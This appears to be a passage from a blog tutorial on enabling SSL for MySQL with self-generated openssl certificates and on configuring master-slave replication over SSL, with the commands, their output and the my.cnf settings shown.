The command will <a href="http://dev.mysql.com/doc/refman/5.0/en/secure-using-ssl.html" target="_blank">create an error</a> if there is no SSL support.<br />
<br />
Next, check that the MySQL server has SSL enabled. The below output means that the server supports SSL but it is not enabled. Enabling it can be done at the command line or in the configuration file, which will be detailed later.<br />
<br />
<hr align="center" color="blue" width="100%" /><pre>$ mysql -u username -p -e"show variables like 'have_ssl'"
Enter password:
+---------------+----------+
| Variable_name | Value |
+---------------+----------+
| have_ssl | DISABLED |
+---------------+----------+</pre><hr align="center" color="blue" width="100%" /><br />
Documentation on setting up certificates:<br />
<a href="http://dev.mysql.com/doc/refman/5.0/en/secure-create-certs.html" target="_blank">5.5.7.4. Setting Up SSL Certificates for MySQL</a><br />
<br />
First, generate the CA key and CA certificate:<br />
<br />
<hr align="center" color="blue" width="100%" /><pre>$ openssl genrsa 2048 > mysql-ca-key.pem
Generating RSA private key, 2048 bit long modulus
............................................+++
............+++
$ openssl req -new -x509 -nodes -days 356 -key mysql-ca-key.pem > mysql-ca-cert.pem
You are about to be asked to enter information that will be incorporated
into your certificate request.
What you are about to enter is what is called a Distinguished Name or a DN.
There are quite a few fields but you can leave some blank
For some fields there will be a default value,
If you enter '.', the field will be left blank.
-----
Country Name (2 letter code) [GB]:US
State or Province Name (full name) [Berkshire]:California
Locality Name (eg, city) [Newbury]:Burbank
Organization Name (eg, company) [My Company Ltd]:Acme Road Runner Traps
Organizational Unit Name (eg, section) []:Acme IRT
Common Name (eg, your name or your server's hostname) []:mysql.acme.com
Email Address []:acme-irt@acme.com</pre><hr align="center" color="blue" width="100%" /><br />
Create the server certificate:<br />
<br />
<hr align="center" color="blue" width="100%" /><pre>$ openssl req -newkey rsa:2048 -days 365 -nodes -keyout mysql-server-key.pem >
mysql-server-req.pem
Generating a 2048 bit RSA private key
.............................+++
.............................................................+++
writing new private key to 'mysql-server-key.pem'
-----
You are about to be asked to enter information that will be incorporated
into your certificate request.
What you are about to enter is what is called a Distinguished Name or a DN.
There are quite a few fields but you can leave some blank
For some fields there will be a default value,
If you enter '.', the field will be left blank.
-----
Country Name (2 letter code) [GB]:US
State or Province Name (full name) [Berkshire]:California
Locality Name (eg, city) [Newbury]:Burbank
Organization Name (eg, company) [My Company Ltd]:Acme Road Runner Traps
Organizational Unit Name (eg, section) []:Acme IRT
Common Name (eg, your name or your server's hostname) []:mysql.acme.com
Email Address []:acme-irt@acme.com
Please enter the following 'extra' attributes
to be sent with your certificate request
A challenge password []:
$ openssl x509 -req -in mysql-server-req.pem -days 356 -CA mysql-ca-cert.pem -CAkey mysql-ca-key.pem
-set_serial 01 > mysql-server-cert.pem
Signature ok
subject=/C=US/ST=California/L=Burbank/O=Acme Road Runner Traps/OU=Acme IRT/CN=
mysql.acme.com/emailAddress=acme-irt@acme.com
Getting CA Private Key</pre><hr align="center" color="blue" width="100%" /><br />
Finally, create the client certificate:<br />
<br />
<hr align="center" color="blue" width="100%" /><pre>$ openssl req -newkey rsa:2048 -days 356 -nodes -keyout mysql-client-key.pem >
mysql-client-req.pem
Generating a 2048 bit RSA private key
................+++
.................+++
writing new private key to 'mysql-client-key.pem'
-----
You are about to be asked to enter information that will be incorporated
into your certificate request.
What you are about to enter is what is called a Distinguished Name or a DN.
There are quite a few fields but you can leave some blank
For some fields there will be a default value,
If you enter '.', the field will be left blank.
-----
Country Name (2 letter code) [GB]:US
State or Province Name (full name) [Berkshire]:California
Locality Name (eg, city) [Newbury]:Burbank
Organization Name (eg, company) [My Company Ltd]:Acme Road Runner Traps
Organizational Unit Name (eg, section) []:Acme IRT
Common Name (eg, your name or your server's hostname) []:mysql.acme.com
Email Address []:acme-irt@acme.com
Please enter the following 'extra' attributes
to be sent with your certificate request
A challenge password []:
$ openssl x509 -req -in mysql-client-req.pem -days 356 -CA mysql-ca-cert.pem
-CAkey mysql-ca-key.pem -set_serial 01 > mysql-client-cert.pem
Signature ok
subject=/C=US/ST=California/L=Burbank/O=Acme Road Runner Traps/OU=Acme
IRT/CN=mysql.acme.com/emailAddress=acme-irt@acme.com
Getting CA Private Key
[nr@mysqld mysqlcerts]$ ls
mysql-ca-cert.pem mysql-client-key.pem mysql-server-key.pem
mysql-ca-key.pem mysql-client-req.pem mysql-server-req.pem
mysql-client-cert.pem mysql-server-cert.pem</pre><hr align="center" color="blue" width="100%" /><br />
To enable SSL when starting mysqld, the following should be in /etc/my.cnf under the [mysqld] section. For this example, I put the files in <tt>/etc/mysql/openssl</tt>:<br />
<br />
<hr align="center" color="blue" width="100%" /><pre>ssl-ca="/etc/mysql/openssl/mysql-ca-cert.pem"
ssl-cert="/etc/mysql/openssl/mysql-server-cert.pem"
ssl-key="/etc/mysql/openssl/mysql-server-key.pem"</pre><hr align="center" color="blue" width="100%" /><br />
To use any client, for instance mysql from the command line or the GUI MySQL Administrator, copy the client cert and key to a dedicated folder on the local box along with ca-cert. You will have to configure the client to use the client certificate, client key, and CA certificate.<br />
<br />
To connect with the mysql client using SSL, copy the client certificates to a folder, for instance /etc/mysql, then under the [client] section in /etc/my.cnf:<br />
<br />
<hr align="center" color="blue" width="100%" /><pre>ssl-ca="/etc/mysql/openssl/mysql-ca-cert.pem"
ssl-cert="/etc/mysql/openssl/mysql-client-cert.pem"
ssl-key="/etc/mysql/openssl/mysql-client-key.pem"</pre><hr align="center" color="blue" width="100%" /><br />
In MySQL Administrator, the following is an example you would put into the Advanced Parameters section if you want to connect using SSL.<br />
<br />
<hr align="center" color="blue" width="100%" /><pre>SSL_CA U:/keys/mysql-ca-cert.pem
SSL_CERT U:/keys/mysql-client-cert.pem
SSL_KEY U:/keys/mysql-client-key.pem
USE_SSL Yes</pre><hr align="center" color="blue" width="100%" /><br />
<span style="font-size: large;">Replication</span><br />
<br />
Before configuring replication, I made sure to review the <a href="http://dev.mysql.com/doc/refman/5.0/en/replication.html" target="_blank">MySQL replication documentation</a>.<br />
<br />
<a href="http://dev.mysql.com/doc/refman/5.0/en/replication-howto-repuser.html" target="_blank">16.1.1.1. Creating a User for Replication</a><br />
Because MySQL stores the replication user’s name and password using plain text in the master.info file, it’s recommended to create a dedicated user that only has the REPLICATION SLAVE privilege. The replication user needs to be created on the master so the slaves can connect with that user.<br />
<br />
<hr align="center" color="blue" width="100%" /><pre>GRANT REPLICATION SLAVE ON *.* TO 'repl'@'192.168.1.50' IDENTIFIED BY ‘password’;</pre><hr align="center" color="blue" width="100%" /><br />
<a href="http://dev.mysql.com/doc/refman/5.0/en/replication-howto-masterbaseconfig.html" target="_blank">16.1.1.2. Setting the Replication Master Configuration</a><br />
Edit my.cnf to uncomment the “log-bin” line. Also uncomment “server-id = 1”. The server-id can be anything between 1 and 2^32 but must be unique.<br />
<br />
Also add “expire_logs_days” to my.cnf. If you don’t, the binary logs could fill up the disk partition because they are not deleted by default!<br />
<br />
<hr align="center" color="blue" width="100%" /><pre>expire_log_days = 4</pre><hr align="center" color="blue" width="100%" /><br />
<a href="http://dev.mysql.com/doc/refman/5.0/en/replication-howto-slavebaseconfig.html" target="_blank">16.1.1.3. Setting the Replication Slave Configuration</a><br />
Set server-id to something different from the master in <tt>my.cnf</tt>. Although not required, enabling binary logging on the slave is also recommended for backups, crash recovery, and in case the slave will also be a master to other systems.<br />
<br />
<a href="http://dev.mysql.com/doc/refman/5.0/en/replication-howto-masterstatus.html" target="_blank">16.1.1.4. Obtaining the Master Replication Information</a><br />
I flush the tables to disk and lock them to temporarily prevent changes. <br />
<br />
<hr align="center" color="blue" width="100%" /><pre># mysql -u root -p -A dbname
mysql> FLUSH TABLES WITH READ LOCK;
Query OK, 0 rows affected (0.00 sec)</pre><hr align="center" color="blue" width="100%" /><br />
If the slave already has data from master, then you may want to copy over data manually to simplify things, <a href="http://dev.mysql.com/doc/refman/5.0/en/replication-howto-rawdata.html" target="_blank">16.1.1.6. Creating a Data Snapshot Using Raw Data Files</a>. However, you can also use mysqldump, as shown in <a href="http://dev.mysql.com/doc/refman/5.0/en/replication-howto-mysqldump.html" target="_blank">Section 16.1.1.5, “Creating a Data Snapshot Using mysqldump”</a>.<br />
<br />
Once the data is copied over to the slave, I get the current log position.<br />
<br />
<hr align="center" color="blue" width="100%" /><pre>Mysql> SHOW MASTER STATUS;
+------------------+----------+--------------+------------------+
| File | Position | Binlog_Do_DB | Binlog_Ignore_DB |
+------------------+----------+--------------+------------------+
| mysql-bin.000002 | 16524487 | | |
+------------------+----------+--------------+------------------+
1 row in set (0.00 sec)
mysql> UNLOCK TABLES;</pre><hr align="center" color="blue" width="100%" /><a href="http://dev.mysql.com/doc/refman/5.0/en/replication-howto-slaveinit.html" target="_blank"><br />
16.1.1.10. Setting the Master Configuration on the Slave</a><br />
Finally, configure the slave. The log file and log position tell the slave where to begin replication. All changes after that log position will be replicated to the slave.<br />
<br />
<hr align="center" color="blue" width="100%" /><pre>mysql> CHANGE MASTER TO
-> MASTER_HOST=’192.168.1.50’,
-> MASTER_USER=’repl’,
-> MASTER_PASSWORD='replication_password',
-> MASTER_LOG_FILE=’ mysql-bin.000002’,
-> MASTER_LOG_POS=16524487,
-> MASTER_SSL=1,
-> MASTER_SSL_CA = '/etc/mysql/openssl/mysql-ca-cert.pem',
-> MASTER_SSL_CAPATH='/etc/mysql/openssl/',
-> MASTER_SSL_CERT = '/etc/mysql/openssl/mysql-server-cert.pem',
-> MASTER_SSL_KEY = '/etc/mysql/openssl/mysql-server-key.pem';
Query OK, 0 rows affected (0.74 sec)
mysql> START SLAVE;</pre><hr align="center" style="color: blue;" width="100%" /><br />
Replication can start!<br />
The slave status can be checked via the following command:<br />
<br />
<hr align="center" style="color: blue;" width="100%" /><pre>mysql> show slave status;</pre><hr align="center" style="color: blue;" width="100%" />Nathaniel Richmondhttp://www.blogger.com/profile/16307898781407130985noreply@blogger.com0